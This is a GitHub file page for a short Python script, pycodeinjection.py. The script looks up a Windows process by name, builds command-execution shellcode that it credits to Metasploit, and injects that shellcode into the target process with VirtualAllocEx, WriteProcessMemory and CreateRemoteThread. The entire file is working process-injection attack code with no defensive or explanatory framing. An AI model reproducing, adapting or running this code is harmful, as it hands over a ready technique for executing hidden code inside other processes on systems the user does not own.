-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathpycodeinjection.py
More file actions
40 lines (35 loc) · 2.05 KB
/
pycodeinjection.py
File metadata and controls
40 lines (35 loc) · 2.05 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from ctypes import *
from win32com.client import GetObject
def getPID(processname):
WMI = GetObject('winmgmts:')
p = WMI.ExecQuery('select * from Win32_Process where Name="%s"' %(processname))
if len(p) == 0:
return 0
return p[0].Properties_('ProcessId').Value
def generateShellcode(cmdString):
# Windows Exec Shellcode Sourced from the Metasploit Framework
# http://www.rapid7.com/db/modules/payload/windows/exec
shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" + \
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" + \
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" + \
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" + \
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" + \
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" + \
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" + \
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" + \
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" + \
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d" + \
"\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb" + \
"\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" + \
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" + \
"\xff\xd5" + cmdString + "\x00"
return shellcode
# Injects shellcode: Takes in shellcode as string, converts to bytearray
def injectShellcode(pid, shellcode):
shellCode = bytearray(shellcode)
process_handle = windll.kernel32.OpenProcess(0x1F0FFF, False, pid) #get handle of target process
memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, None, len(shellcode), 0x1000, 0x40) #allocate memory for shellcode in target process
windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, len(shellcode), None) #write shellcode into allocated memory
if not windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, None, 0, None): #start thread with injected code
return False
return True